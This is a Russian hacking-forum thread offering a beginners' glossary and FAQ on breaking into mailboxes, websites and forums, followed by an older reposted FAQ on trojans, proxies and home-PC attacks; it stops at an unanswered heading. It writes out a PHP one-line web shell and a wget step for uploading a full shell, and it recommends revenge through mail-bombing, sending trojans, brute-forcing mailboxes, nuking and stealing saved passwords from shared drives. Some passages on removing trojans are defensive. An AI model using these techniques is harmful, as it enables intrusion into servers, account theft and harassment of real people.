F.A.Q: Что надо знать новичку ? — HackZona.Ru

[ Термины и сленг компьютерного мира ] :: Общие понятия :: Hacker, хакер, хеккер, хек — человек, занимающийся всем тем, что здесь описано. Подробнее см. выше. Lamer, ламер, ламерок, лам, ламо — человек, противоположный хакеру. Чаще всего является жертвой взломщиков. Server, сервер — объект атаки хакеров. Чаще всего располагает на себе множество сайтов. Такой сервер будет у хостеров. Bud, баг, уязвимость — недокументированная возможность, дающая возможность хакеру получить при определенных условиях доступ на сервере, последующее поднятие прав. Botnet, ботнет — сеть компьютеров-жертв под управлением хакера. Чаще всего протроянизированные (см. ниже троян). Используется для DDoS'а серверов (см. ниже DDoS, DoS). Google, гугл, гугль — это поисковая система, лучший друг и напарник хакера. Самое большое количество уязвимостей находится именно через него. Его можно найти по адресу [url]http://www.google.ru/[/url] Bruteforce, брутфорс, брут — метод атаки, заключающ

F.A.Q: Что надо знать новичку ?

Сообщений в теме: 7
Нравится
Не нравится
Репутация: 0
Рейтинг: 1
Кол-во тем: 45
Сообщения: 0
[ Термины и сленг компьютерного мира ]

:: Общие понятия ::

Hacker, хакер, хеккер, хек — человек, занимающийся всем тем, что здесь описано. Подробнее см. выше.

Lamer, ламер, ламерок, лам, ламо — человек, противоположный хакеру. Чаще всего является жертвой взломщиков.

Server, сервер — объект атаки хакеров. Чаще всего располагает на себе множество сайтов. Такой сервер будет у хостеров.

Bud, баг, уязвимость — недокументированная возможность, дающая возможность хакеру получить при определенных условиях доступ на сервере, последующее поднятие прав.

Botnet, ботнет — сеть компьютеров-жертв под управлением хакера. Чаще всего протроянизированные (см. ниже троян). Используется для DDoS'а серверов (см. ниже DDoS, DoS).

Google, гугл, гугль — это поисковая система, лучший друг и напарник хакера. Самое большое количество уязвимостей находится именно через него. Его можно найти по адресу [url]http://www.google.ru/[/url]

Bruteforce, брутфорс, брут — метод атаки, заключающийся в полном переборе паролей на определенный сервис. Переводится как грубая сила. Различается на брут по словарю и брут прямым перебором.

Fake, фейк, фака — метод атаки из разновидности социальной инженерии (СИ, смотрите ниже), подразумевает обман пользователя путем создания точь в точь похожего ресурса на манер субъекта преступления, т.е., например, создание фейкового mail.ru сервера, где если пользователь введет свои входные данные, они буду перенаправлены фишеру.

Phishing, фишинг, фишер — метод атаки и человек, см. выше о фейке (аналог).

:: Уязвимости ::

SQL Injection, sql инъекция, скуля — это уязвимость, позволяющая удаленному пользователю составлять запросы к базе данных сервера. Различаются типы SQL инъекций по базам данных: Oracle, MySQL, PostgreSQL, MSSQL, etc. Самые частые из них это MySQL, MSSQL, PostgreSQL injections. Подробнее о простейших MySQL инъекциях [url]/hz.php?name=Forums&file;=viewtopic&t;=22643[/url] и [url]/hz.php?name=News&file;=article&sid;=8913[/url] и об остальных инъекциях [url]/hz.php?name=Forums&file;=viewtopic&t;=24623[/url].

XSS, межсайтовый скриптинг, ксс, ксска — это уязвимость, которая позволяет взаймодействовать с браузером пользователя. Разделяется на активную и пассивную. При активной XSS хакер может не взаймодействовать с пользователем напрямую, эксплойт (см. далее что это такое) загружается на сервер, что исключает подозрения со сторону жертвы. Пассивная, соответственно, имеет более «палевный» эффект. Подробнее о XSS для новичков [url]/hz.php?name=News&file;=article&sid;=5005, о продвинутых XSS hackzona.ru/hz.php?name=News&file;=article&sid;=4991[/url] и о методах обхода фильтрации при XSS [url]/hz.php?name=News&file;=article&sid;=9083[/url].

Include bug, инклуд, инклюд — это уязвимость, позвляющая управлять файловой системой сервера. Различается на удаленную и локальную. При удаленной есть возможность подключить веб шелл (см. ниже что это такое), а при локальной только лишь возможность просмотра файлов. Подробнее о PHP инъекциях… [url]/hz.php?name=Forums&file;=viewtopic&t;=24350[/url]

DoS, дос — метод атаки (Denial of Service), позволяющий «положить» сервер. Используется только в крайних случаях. Зачастую требует больших вычислительных ресурсов.

DDoS, ддос — метод атаки (Distributed Denial of Service), позволяющий распределить количество ресурсов для атаки на сервер. См. выше DoS. Используется чаще всего при ботнете (см. выше подробнее о ботнете).

СИ, социальная инженерия — метод атаки на самое уязвимое звено системы — человека. Подробнее о нем можно почитать в книге The Art Of Deception гуру СИ Кевина Митника.

:: Программы ::

Exploit, sploit, сплоит, эксплоит — программа, позволяющая автоматизировать процесс эксплуатирования уязвимости. Различаются на удаленный и локальный, в зависимости от типа уязвимости. Локальные следует загружать на сервер, удаленные можно запускать с собственной машины. Подробнее об эксплоитах на примере форума [url]/hz.php?name=News&file;=article&sid;=8901[/url], [url]/hz.php?name=News&file;=article&sid;=7342[/url].

Shell, шелл, оболочка — это программа, позволяющая управлять удаленно взломанным сервером. Различаются веб шеллы (web shells), биндшеллы (bindshells), бэкдоры (backdoors) и другие. По порядку. Веб шелл — это программа, написанная на языке веб программирования (PHP, Perl, ASP, etc), позволяющая управлять сервером через браузер. Биндшелл — это программа, занимающая порт на сервере (подробнее о портах ниже) и позволяющая работать через него. Бэкдор — это аналог биндшелла, или программа, при определенных условиях дающая права администратора (root), иногда называют руткитами (rootkits).

Malware, вирус, троян — распространенная категория вредоносных программ, позволяющих получить доступ на сервер. Вирусы зачастую используют какие то уязвимости, эксплуатируют их, а затем подгружают трояна. Троян — тип вируса, позволяющий получить управление сервером, зачастую отсылает конфиденциальную информацию взломщику.

сниффер — программа, отслеживающая сетевой траффик. Используется для получения конфиденциальной информации, для определения различных свойств сети.

Bruteforcer, брутфорсер, брутер — программа, перебирающая пароли к сервису. См. выше Bruteforce.

скрипт — набор команд, программа. Используются для веба. Пишутся на различных языках, например на PHP, Perl, ASP, python, etc.

Итак, немного разобрались с терминами (они будут постоянно дополняться), теперь вереходим к F.A.Q.'у по веб хакингу…

[ F.A.Q. ]

Рассмотрим следующие часто задаваемые вопросы:

— Как взломать ящик?
— Как взломать сайт?
— Как взломать форум?
— Что такое сплоит?
— Как использовать сплоит?
— Как угнать аську?
— Как найти SQL inj и проэксплуатировать ее?
— Как найти XSS и проэксплуатировать ее?
— Как найти Inlude и проэксплуатировать его?
— Как сбрутить что-то?
— Как залить шелл?

Как взломать ящик?

Ну для начала смотрим на каком сервере расположена данная услуга (почтовик а не взлом). Если это крупный сервер, типа mail.ru & yandex.ru, то здесь лучше брутить. Для брута существуют специальные программы, которые вы можете найти в разделе новичков [url]/hz.php?name=Forums&file;=viewtopic&t;=28078[/url]. Просто все уязвимости этих серверов лежат в основном в привате и достать их обычному человеку достаточно тяжело. Если же сервер не частоиспользуемый, то можно попытаться найти баги самому. Одна из часто используемых багов — это XSS (см. выше о ней), информацию о ней можно найти ниже по факу. Также возможно использовать атаку типа фейк, или же просто сбрутить ящик.

Как взломать сайт?

Что подразумевается под взломом сайта? Это перехват управления, т.е. админки или фтп доступа. Все это делается с помощью уязвимостей в системе. Их несколько типов: основные ошибки в скриптах (SQL injection, XSS, Include bug, подробнее о них см. в факе), ошибки серверного обеспечения (сетевые программы, например веб сервер, фтп сервер и иже с ними), человеческий фактор. Подробнее об основных ошибках в скриптах было описано выше, эксплуатировать же серверные уязвимости сложнее. Его для незнающих можно эксплуатировать сплоитами. О человеческом факторе говорит книга Кевина Митника..

Как взломать форум?

Для начала определимся, какой версии форум. Если это публичный движок, то идем на любой сайт с багтраком [url]http://milw0rm.ru[/url] или [url]http://bugtrack.ru/[/url] ищем версию форума. При удачном раскладе мы найдем сплоит. Что это аткое и как его есть рассказано ниже. Если же движок самописный или нераспространенный, то ищем баги сами.

Что такое сплоит?

Что такое сплоит, см. в разделе «ВиХ». Про его использование см. там же. [url]/hz.php?name=News&file;=article&sid;=7342[/url]

Как угнать аську?

О методах угона уинов можно говорить бесконечно долго. Подробнее… [url]/hz.php?name=News&file;=article&sid;=4627[/url]
Как найти SQL inj и проэксплуатировать ее?

Что такое SQL Injection, см. выше, также ссылки на статьи о методах ее эксплуатации см. выше.

Как найти XSS и проэксплуатировать ее?

Что такое XSS, см. выше, также ссылки на статьи о методах эксплуатации см. выше.

Как найти Inlude и проэксплуатировать его?

Что такое Include bug, см. выше.

Как сбрутить что-то?

Мы говорили о брутфорсе как о методе, позволяющем при имении больших ресурсов добиться больших успехов. Брутить можно все что угодно, от аси до мыла, но есть также еще и хеши (см. выше что это). Подробнее статью о них можно прочитать, а также сбрутить неподдающийся вам хеш можно здесь [url]/hz.php?name=Forums&file;=viewtopic&t;=23212[/url], о тактике расшифрования читаем тут [url]/hz.php?name=Forums&file;=viewtopic&t;=18985[/url].

Как залить шелл?

Залитие шелла — последний этап во внешнем аудите сайта, по сути его результат. Залить шелл можно разными путями, самый легкий — админка с функцией аплоада. В других случаях придется искать любой форум, в них через функцию заливки разных файлов, например смайлов, можно залить и скрипт. На крайний случай ищем, допустим, редактор страниц или новостей. Вставляем, наприме PHP код (все зависит от используемого интерпретатора), например: [code]
<?php system($_GET['cmd']);?>;[/code]

который сделает мини-шелл, через него заливаем полноценный шелл: [code]
wget -O /usr/loca/apache/htdocs/shell.php[/code]

это при использовании wget'а, также можно самому написать простейший аналог вгета, либо использовать аналог вгета.

:: Данный FAQ будет пополняться со временем ::

P.S Тестируем ссылки и добавлаем новые…

© FIXER
Нравится
Не нравится
Репутация: 0
Рейтинг: 1
Кол-во тем: 45
Сообщения: 0
1. Где можно скачать крякер инета?
Да на каждом углу, например
www.yandex.ru/yandsearch?text=крякер+интернет.
Когда ты им воспользуешься, кто-то скажет тебе спасибо за бесплатный интернет, а ты получишь много счетов, если платишь за инет.

2. Что такое троян?
Троян — это то что ты не когда не полюбиш если его впарили тебе, это программа, которая в фоновом режиме производит некоторую деятельность, результаты которой вряд ли понравятся юзеру. Например, похищение его паролей, управление файловой системой или банальное открывание CD-ROM'а. Классический пример распространения трояна — крякер инета. Трояны делятся на похищающие пароли и дающие полный контроль над системой (backdoor).

3. Каков принцип работы систем удаленного администрирования (backdoor)?
Большинство троянов состоят из клиента и сервера, иногда клиентом может
служить любой телнет клиент. Сервер должен работать на машине жертвы, он как
правило, открывает на зараженной машине порт и ждет подключения хакера. Тот, с
помощью клиента подключается к открытому трояном порту и подает серверной части команды, которая их исполняет: передает файлы, открывает CD-Rom, выключает компьтер…

4. Что такое порт?
Порт — это идентификатор определённого сервиса, которым пользуются программы соответствующего назначения. Например, 80 по умолчанию — http, 21 — ftp. Это нематериальная вещь, просто идентификатор, пакеты с которым будут передаваться процессу, 'слушающему' этот порт.

5. Когда я в инете у меня вдруг начинает открывается CD-ROM, запускаются приложения, флоппик пытается музицировать, появляются странные сообщения. В чем дело? Видимо некто, возомнивший себя кул хакером, а может просто твой приятель, подсунул тебе трояна. Давно тебе по почте приходили бесплатные картинки с порносайтов или предложения заработать 1000$ ничего не делая с прикрепленными файлами? А может, ты скачал крякер инета или другую супер пупер мегакульную прогу? Ты, конечно, больше не будешь их открывать? Тогда приступаем к лечению(уничтожению =)).

В Windows есть такая отвратительная (потому что сложная для новичков) или рулезная (по той же причине Well) штука, как РЕЕСТР. Ты про него уже по-любому слышал. Реестр состоит из РАЗДЕЛОВ и СТРОК (все строчки с текстовой информацией разбиты по своим разделам). Строка типа «HKEY_LOCAL_MACHINE

SOFTWAREMicrosoftWindowsCurrentVersionRun» — типичное название раздела реестра. В этом разделе содержится часть программ, которые автоматически запускаются при старте твоего Маздая. Есть еще папка «Пуск-Программы-Автозапуск» и файл autoexec.bat (config.sys), но, скорее всего, там ты никаких ЛЕВЫХ программ (в дальнейшем ТРОЯНОВ) не обнаружишь, так как туда записываются только особо изощренные Трояны, коих, по крайней мере, я еще не обнаруживал Well. Для просмотра папки АВТОЗАГРУЗКА достаточно нажать кнопку ПУСК и зайти в ПРОГРАММЫ, для просмотра файлов config.sys и autoexec.bat достаточно запустить notepad. А вот для просмотра РЕЕСТРА нужна программа c:windowsRegEdit.exe, которая может показывать эти разделы и строчки.
Как я уже сказал, большинство Троянов записывает себя в HKEY_LOCAL_MACHINE

SOFTWAREMicrosoftWindowsCurrentVersionRun, но, помимо этого, существует еще масса мест в реестре, куда следовало бы заглянуть. Например: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows

CurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows

CurrentVersionRunOnce
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows

CurrentVersionRunservices
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows

CurrentVersionRunservicesOnce
HKEY_USERS.DefaultSOFTWAREMicrosoftWindows

CurrentVersionRun
HKEY_USERS.DefaultSOFTWAREMicrosoftWindows

CurrentVersionRunOnce
HKEY_USERS.DefaultSOFTWAREMicrosoftWindows

CurrentVersionRunservices
HKEY_USERS.DefaultSOFTWAREMicrosoftWindows

CurrentVersionRunservicesOnce
Для того чтобы не метаться в диких муках по всему вышеперечисленному вручную, достаточно запустить regedit /e tmp1.txt ИМЯ РАЗДЕЛА, в результате чего после каждого запуска заново будет создан файл tmp1.txt с содержимым
раздела реестра… Посмотрев туда, нужно удалить все «Строковые параметры», запускающие неизвестные программы из соответствующего раздела реестра! Например, довольно популярный Троян «Naebi Soseda» записывает себя как с:windowsmswinrun.exe, c:windowstempmswinrun.exe.
Другой Троян — GF — записывает себя как c:windowswindll.exe, c:windowssystemwindll.exe. Разберем Троян Stealth наших друганов — KurT'a и Doc'a. Вот что они сами говорят про него: «Как и большинство подобных программ, наша после первого запуска копирует себя в директорию, где живут Винды, под каким-нибудь неприметным именем. В то же время она добавляет себя в один из разделов регистра, который обеспечивает ей загрузку при каждом старте Виндов. Для обеспечения прикрытия свой легенды (т.е. чем ее представили жертве), она может выдать какое-нибудь сообщение, типа „Required DLL MFC50.DLL not found. The program will now terminate“, что в переводе с буржуйского значит: „Требуемая библиотечка MFC50.DLL не найдена. Программа завершит свою работу.“
Все лишние программы из реестра, особенно те, которые не устанавливались специально, нужно удалить. Тут будь осторожен, так как со временем на компьютер устанавливается большое количество программ, и многие из них записывают себя по мере надобности в реестр, т.е. удаление надо производить только с особой тщательностью и аккуратностью. Боишься удалять? Тогда на фиг закрой реестр и больше туда не лезь. Да не, это я шутю, это юмор такой — на самом деле просто переименуй имя программы, например „с:program filesicqicq.exe“ в „с:program filesicqnull“ (чтобы проверить, изменилось
ли что-то от того, что эта программа не запускается). Подраздел SOFTWAREMicrosoftWindowsCurrentVersionRun есть не только в разделе HKEY LOCAL MACHINE, а еще и в HKEY USERS (HKEY USERS.Default или HKEY USERS. Твой логин при старте). Поэтому также не забудь поискать разделы типа „Run“ (»RunOnce", «Run...») еще в 2 главных разделах. Если Троян все же запустился, то ты явным образом можешь его увидеть и выключить, нажав Ctrl+Alt+Del. Однако, даже если нажав Ctrl+Alt+Del ты ничего не обнаружил, радоваться еще рано. Полную информацию о запущенных программах в Windows можно увидеть, запустив утилиту XRun. Также подойдет утилита CTask, выполняющая аналогичные действия. Вот список типичных приложений, которые ты там можешь увидеть: KERNEL32.DLL, MSGSRV32.EXE, MPREXE.EXE, MMTASK.TSK, VSHWIN32.EXE, EXPLORER.EXE, SYSTRAY.EXE, INTERNAT.EXE, LOADWC.EXE, RUNDLL.EXE, STARTPG.EXE, RNAAPP.EXE, TAPIEXE.EXE, SPOOL32.EXE, WSASRV.EXE. Запоминать их все, конечно, не нужно (хотя можешь, тебе это не помешает), и если ты чего-нибудь из этого списка не увидишь — то это не значит что твой Маздай установился не полностью. Здесь просто собрано большинство системных программ, используемых Маздаями. А вот если увидишь что-то новое в реестре, не надо сразу бросаться удалять все подряд и форматировать винт, а следует спокойно разобраться с этой программой — откуда она у тебя и что делает. Помнишь такую старую поговорку — семь раз отмерь, один раз отрежь? Вот тут все так же: семь раз прикинь, один потри. Если же в реестре ничего нет, то следует пробежаться по конфигурационным файлам Windows, таким как win.ini и system.ini. Win.ini и system.ini находятся в каталоге c:windows, самый простой способ запустить программу оттуда — это написать «run=путьтроян.exe» или «load=программа». Хотя запись сюда производится довольно редко, т.к. здесь довольно просто обнаружить что-то подозрительное, нежели, например, в реестре. Если вышеизложенные способы ничего не дали, а у тебя все-таки осталась навязчивая мысль о том, что ты подвергся заражению — то тогда возьми любой сканер портов, зайди в Инет и проскань свой IP (127.0.0.1 — одно из обозначений твоего компьютера в сети) на предмет «подозрительных» портов… Если у тебя открыты нестандартные порты — то есть повод для разбирательств.
Ниже приводится список «стандартных» портов, которые зачастую могут использоваться в твоей системе:
21 — FTP
23 — Telnet
80 — HTTP
53 — DNS
139 — NetBios
1027 — ICQ
Если у тебя на компьютере хранятся пусковые коды ракет Пентагона или какая-то очень личная информация, и ты ОЧЕНЬ беспокоишься о ее безопасности — скачай себе FireWall (такая спец. прога, ею можно порты себе перекрыть или чего-нибудь еще сделать). После некоторой головной боли в ее настройке ты сможешь наблюдать, кто к какому порту хочет приконнектиться…
Очень хороша в этом случае программа ATGuard — с помощью этой утилиты ты в любой момент сможешь посмотреть, кто к тебе подключен, какое приложение для этого используется, на каком порту идет передача и какой IP-адpес подключившегося. В крайнем случае с ее помощью ты всегда сможешь разорвать соединение или включить FireWall. Теперь, если ты обнаружил подозрительное приложение, которое «висит» на каком-нибудь порту, советую его проверить.

Ниже идет несколько простых правил, соблюдая которые, ты можешь не беспокоиться о своей безопасности:
1. Скачивать программы можно ТОЛЬКО из надежных источников и как можно меньше со всяческих якобы «хакерских» сайтов… Львиная доля Троянов приходится именно на файлы с этих серверов.
2. Если ты скачал какую-то программу — ОБЯЗАТЕЛЬНО проверь ее на наличие вирусов. Наилучшим вариантом для тебя будет установить на компьютер антивирусный пакет AVP, разработанный Касперским, или же DrWeb.
3. Никогда не запускай программы, пришедшие к тебе по E-MAIL, т.к. очень часто всяческие шутники и иже с ними cool haxorы рассылают так программы-приколы. Поверь, Троян — это еще не худший вариант беды. Вот пришлют тебе какой-нибудь порнухи, и растеряешь ты всю свою бдительность.
4. В качестве паролей всегда используй замысловатые наборы символов, типа Jqp2FQs, и по возможности старайся их вводить в окне терминала вручную — это обезоружит Троянов, отсылающих пассворды на чей-то E-MAIL адрес.
5. Будь бдителен.
Если ты не следовал этим правилам, и у тебя украли твои пароли, то СРАЗУ же пошли письмо в офис провайдера с просьбой о смене пароля! Или позвони в службу поддержки.
Кстати: есть такие Трояны, что обнаружить их почти невозможно! (таким Трояном является EPS I и II) Разве что только через At-Guard посмотреть на используемые порты. На данный момент я владею Трояном типа Mail Sender, который использует RING0 — это означает, что его не видно ни в реестре, ни в памяти… А скоро, возможно, автор научит его обходить и At-Guard. Лично у меня большая коллекция Троянов, все я тестировал на своей машине. Я встречал даже такие, которые удаляют At-Guard с системы или ставят запрет на просмотр скрытых процессов (просмотр возможен только DOS-yтилитами).
Но самое главное — за всю жизнь я не встретил ни одного Трояна, от которого не смог бы избавиться. Так что будь аккуратен, пользуйся презервативом, переходи улицу на зеленый свет, ну а если уж посадил Трояна — лечись и борись с ними! Успехов тебе в этом нелегком деле — борьбе с конями компьютерного фронта.

6. Что такое реестр Windows и как вносить в него изменения?
Реестр (registry) — это база данных, в которой Windows и многие приложения
под Windows хранят свои настройки, пароли, регистрационную информацию. Он пришел на смену ini файлам windows 3.11, хотя ini файлы используются и до сих
пор. Реестр имеет иерархическую структуру (как дерево каталогов, только в место
каталогов — ключи) и содержится в файлах c:windowssystem.dat и c:windowsuser.dat в упакованном виде. Редактировать и просматривать реестр
позволяет программа regedit, входящая в дистрибутив windows.

7. Мои счета за инет стали непомерно большими. Деньги с моего счета исчезают непомерно быстро. Видимо кто-то похитил у тебя логин/пароль, которые выделил тебе провайдер и пользуется инетом за твой счет. Первое что надо сделать, это сменить пароль.Далее нужно поискать троянов в системе. Также очень часто пароли похищаются, если диск C: сделан общим хотя бы для чтения. Если твоя система Windows 95/98/ME и твой диск С: доступен через сеть даже под паролем из 20 символов, то немедленно закрой к ним доступ. Поскольку Windows ограничивает длину пароля общих ресурсов 8 символами и позволяет подобрать этот пароль за 5 минут из любой точки земного шара.

8. Что надо делать, чтобы это не повторилось?
Есть несколько простых правил, выполняя которые ты обезопасишь свой
workstation почти на 100%:
1. Никогда не расшаривай диски целиком, даже под паролем, особенно тот диск где стоит директория Windows;
2. Никогда не запускай прикрепленные к письмам файлы, если не уверен в
отправителе, а даже если уверен, то все равно проверь свежим антивирусом;
3. Никогда не кидайся сразу смотреть фотку твоей новой подружки, которую она
прислала тебе по асе. Сначала сохрани ее на диск и посмотри внимательно на имя
файла. Он случайно не исполняемый?;
4. Перед тем как запустить прогу, скачанную из инета проверь ее
свежим антивирусом, если она кажется тебе чем-то подозрительной, не запускай;
5. Поставь firewall, например Personal firewall от дяди Нортона, он выявит даже
неизвестные твоему антивирусу трояны;
6. И, естественно, никого не подпускай к своему компу, ведь стянуть настройки
dial-up'а имея доступ к компу дело пары секунд.

9. Что такое firewall?
Это программный либо программно-аппаратный комплекс осуществляющий
фильтрацию входящих/исходящих пакетов. Позволяет ограничить доступ к портам/адресам защищаемой машины/сети.

10. Что можно узнать по e-mail о его обладателе?
Все что угодно, но боюсь что только методами социальной инженерии. Например,
просто спросить. Пишешь письмо либо ловишь в асе и, притворяясь лицом
противоположного пола, предлагаешь познакомиться. Скорее всего сможешь узнать
все, что угодно, если у тебя найдется хоть пара байтов актерского мастерства.

11. На днях мне пришло письмо с оскорблениями/трояном, как можно отомстить?
Можно загадить ящик несколькими тысячами писем с помощью программ типа
avalanche или подписать его на все известные тебе подписки, также стоит попробовать послать троянца по почте или асе. Можно попробовать лишить гада ящика с помощью социальной инженерии. Например, пожаловаться службе поддержки/админу, что тебе прислали вирус/троян. Также всегда есть шанс лишить его ящика подобрав пароль с помощью remote password cracker'ов типа Brutus либо прикинувшись владельцем адреса и симулировав амнезию (иногда возможно угадать ответ на секретный вопрос, если сервис бесплатный). По e-mail есть шанс найти UIN отправителя и зафлудить ему асю программами типа icq flood. Также можно попытаться определить ip отправителя и посмотреть на его машину.

12. Что такое ip-адрес?
Это уникальное четырехбайтовое значение, присваиваемое каждой машине,
подключенной к интернету. Как правило они записываются как четыре десятичных
числа, разделенных точками, по одному числу на байт. Например 192.168.0.1.
ip-адрес не всегда постоянен, например у пользователей, подключающихся к инету
по коммутируемой линии меняется, если только обратное не указано в договоре с
провайдером, у пользователей подключенных к локальной сети он, как
правило, постоянен. Свой ip можно узнать, подключившись к инету с помощью программы winipcfg, входящей в дистрибутив windows.

13. Что можно узнать о человеке, зная его ip?
В принципе все что угодно, но гарантировано — только провайдера и город.
Начать стоит с сервиса whois, например www.ripe.net/perl/whois, там,
скорее всего есть информация о провайдере, в контактном адресе провайдера
содержится город. Если у него на машине что-нить расшарено и то есть шанс найти
там телефон/адрес, либо стянут логин/пароль прова и найти требуемую информацию на страничке статистики.

14. На днях мне пришло письмо с оскорблениями/трояном, как определить ip отправителя? Если у тебя сохранился текст письма, шанс есть, причем обратно
пропорциональный интеллекту отправителя. Надо посмотреть почтовые заголовки
письма (headers, RFC-882). В самой последней строке вида
Received: from ppp88...ru ([212.164.xxx.xxx] hello =)
и есть ip. НО:
1. старые версии smtp могли не прописывать ip отправителя;
2. он мог пользоваться web-интерфейсом бесплатного почтового сервиса. Некоторые
из них прописывают ip машины, с которой отправлено письмо в заголовках, но это
можно легко обойти воспользовавшись анонимным прокси.
3. он мог пользоваться анонимным remailer'ом, который не пишет заголовков
4. например, mail-bomber avalanche подделывает заголовки так, что отправитель
становится как бы промежуточным хостом на пути письма.

FAQ для начинающих Хакеров #2
1. Что такое прокси-сервер (proxy)?
Proxy — Сервера
Некий тип занимался кардингом, и все было бы хорошо, но это чудо даже не позаботилось о своей безопасности, наивно полагая, что, используя Proxy сервер своего провайдера, он обезопасит себя от всех спецслужб и прочив казлов типа...=) Общеизвестен тот фактт, что любой PROXY сервер ведет логи всех действий, совершаемых пользователем. И если вдруг у спецслужб возникнут подозрения на то, что ты совершал неправомерные действия, то они имеют право запросить у провайдера всю информацию о тебе и твоих перемещениях в Сети твоего брата или тебя =). Вот тут-то тебя и вздрюкнут =) И не надо думать, что ты крутой, что IP еще ничего не говорит. Все он говорит, даже твой домашний адрес. Но об этом мы расскажемкак-нибудь в другой раз, а пока разберемся в этих злосчастных proxy-серверах.

2. Как скрыть свой реальный IP адрес?
Все прокси серверы делятся на две большие группы, это transparent (прозрачные) и no transparent (не прозрачные). Если ты используешь Transparent сервер, то не надейся на то, что твой реальный IP адрес никто не раскроет! При запросе такой Proxy cервер выдаст всю необходимую информацию о тебе. А вот при использования no transparent PROXY твой реальный IP адрес врагу
узнать не удастся! И он будет наивно полагать, что ты находишься гдето во Франции или сделаем подальше в США, то есть будет видеть лишь физическое положение самого Proxy сервера, но не тебя. Если ты не уверен в том, что тебя может спасти один анонимный прокси сервер, то можешь использовать последовательность
проксей: www.putin.ru/
proxy1:port/http://www.putin.ru/
proxy2:port/http://www.putin.ru/
(учти, что не все прокси могут работать таким образом). В этом случае ты связываешься с нужным хостом, проходя через целую
цепочку проки серверов. И если все они no transparent, то отследить тебя будет практически невозможно. Этот метод очень удобен для чатов, гостевых книг и досок обьявлений. В случае с чатом твоя легенда будет зависит от выбранного Proxy сервера. А то часто зайдет какой-нибудь крендель с финским IP-шником и начинает рассказывать, как у него тут жарко, да еще к тому же и носороги по улицам ходить мешают и в море акул немеренно. Все в недоумении. Но знающие люди сразу просекают, что этот баклан через прокси залез. Вобщем, сам себя сдал. Well

3. Как ускорить получение информации в Интернет?
На PROXY серверах хранится большое количество динамически изменяющейся информации с серверов Интернет — это страницы, графика, файлы и т.п. Если ты зашел через прокси, залез на сайт с порнухой, насмотрелся картинок, а после тебя кто-нибудь другой из пользователей PROXY сервера полез на этот же сайт, то второму человеку повезло. Прокси сервер кеширует все, что через него проходит, динамически обновляя свой кеш. Следовательно, второй юзер будет тащить все картинки уже с самого прокси сервера, а не с настоящего сайта, а значит, он получит более быстрый доступ к страницам. Но на этом все прелести и возможности использования proxy серверов не кончаются.

4. Как довести до инфаркта АДМИНА чата?
Прошли те времена, когда www-чат был в диковинку. Когда-то там можно было творить все что угодно! Использовать HTML теги, писать ОГРОМЕННЫМИ буквами и делать другие гадости назло всем. Но самая хорошая вещь www-чатов жива и поныне. Если тебя выкинули из чата без права повторного входа, то тут лучше всего поможет смена PROXY сервера в настройках твоего браузера. Как только ты сменил себе прокси, то сможешь заново зайти в чат и, до того как тебя оттуда опять выкинет разьяренный Админ, ты успеешь выругаться матом с применением HTML Тегов. 10 — 20 таких заходов, и Админ в Морге 8-]. Понимаю, что руками менять прокси — это не совсем удобно, но есть программки, делающие это автоматически.

5. Как настроить броузер для подключения к Proxy?
Internet Explorer 4.x и выше Для настройки прокси сервера загрузите браузер, зайдите в «Вид» => «Свойства обозревателя». Перед вами будет менюшка. Выберите закладку «Соединение», выделите галочкой «Подключаться к Интернету через прокси-сервер». Список серверов находиться ниже.Netscape Communicator 4.x и выше Для настройки прокси сервера загрузите браузер, зайдите в «Правка» => «Настройка». Перед вами будет менюшка, как на рисунке справа (кликните мышкой для увеличения). Выберите категорию «Дополнительные настройки» => «Прокси-сервер». Выберите «Подключение через прокси-сервер» и нажмите «Настройка». Проверить свой прокси на предмет его полной анонимности можно в разделе Полезное. Если ты увидишь сообщение «Proxy server is detected!» — то это значит, что твой прокси не имеет защиты, и тебе будет предоставлена информация о твоем реальном IP адресе, как, впрочем, и об IP адресе прокси сервера, который ты используешь. Если же сообщение гласит «Proxy server is not detected» — то все в порядке!

6. Как узнать ip Васи Пупкина/Маши Пилюлькиной?
Явным образом, по имени/фамилии/телефону/e-mail'у никак. Можно попробоватьнаписать ему письмо и, если он ответит, посмотреть ip в заголовке. Можно попытаться найти его асю (если он ей пользуется) по имени/фамилии/e-mail, а затем определить ip c помощью прог типа ICU.

7. Я узнал ip Васи Пупкина/Маши Пилюлькиной, что с ним можно сделать?
Во-первых, можно проверить, нет ли у него расшареных ресурсов с помощью прог типа Essential Nettools или LANGuard Network Scanner. Если расшарены, то можно украсть пароли от ICQ/e-mail/shared resources/некоторых web-страниц, любые
документы, порнуху… В общем можно узнать много интересного. Если ресурс открыт на запись, то можно попробовать подсадить троянца. Если же ничего такого нет, то можно попытаться временно выкинуть его из сети с помощью прог класса nuker,
например, IGMP.

8. Как скрыть обратный адрес и ip, отправляя почту?
Читай вопрос про определение ip c которого послано письмо.

9. Как получить доступ к общим ресурсам, зная ip?
Для этого в Windows 9x, теоретически, надо установить службы:
Клиент для сетей Microsoft, Служба доступа к файлам и принтерам сетей Microsoft —
и в случае dial-up соединения поставить в его настройках галочку «Войти в сеть», при этом подключение будет происходить существенно (до нескольких минут) дольше.Далее, есть два пути: чтобы работать через проводник достаточно выполнить чтобы работать с помощью других оболочек нужно выполнить команду net use x:<имя ресурса>
, то же можно проделать выбрав пункт 'Подключить сетевой диск' в папке 'Вся сеть', после чего с ресурсом можно работать как с локальным диском.

10. Я получил доступ к диску C:, какие пароли я теперь могу узнать?
Все запоминаемые Windows пароли (расшареные ресурсы, dial-up, NT domain...) в файлах C:WINDOWS.pwl, естественно в зашифрованном виде, правда 50% пользователей имеют пустой пароль и расшифровывать ничего не приходится. Длы
расшифровки и просмотра используются программы типа Repwl или PWLHack. Всем известная ICQ хранит пароли в файлах <2000b|2000a|NewDB|99b|...>.dat, в зависимости от версии. Их содержимое вместе с паролем, контакт листом и прочей дребеденью легко извлекается прогой ICQr Information. Замечательный почтовый клиент The Bat! позволяет подсмотреть полный данные о почтовом аккаунте, если подсунуть ей чужой профиль и с помощью программы Open Pass посмотреть закрытый звездочками пароль, остальное она прочитает и расскажет сама. Кроме перечисленных, существует огромное количество сохраняющих пароли прог, это — самые массовые.

11. Как взломать www сервер, зная его ip? (thx to Apis.net)
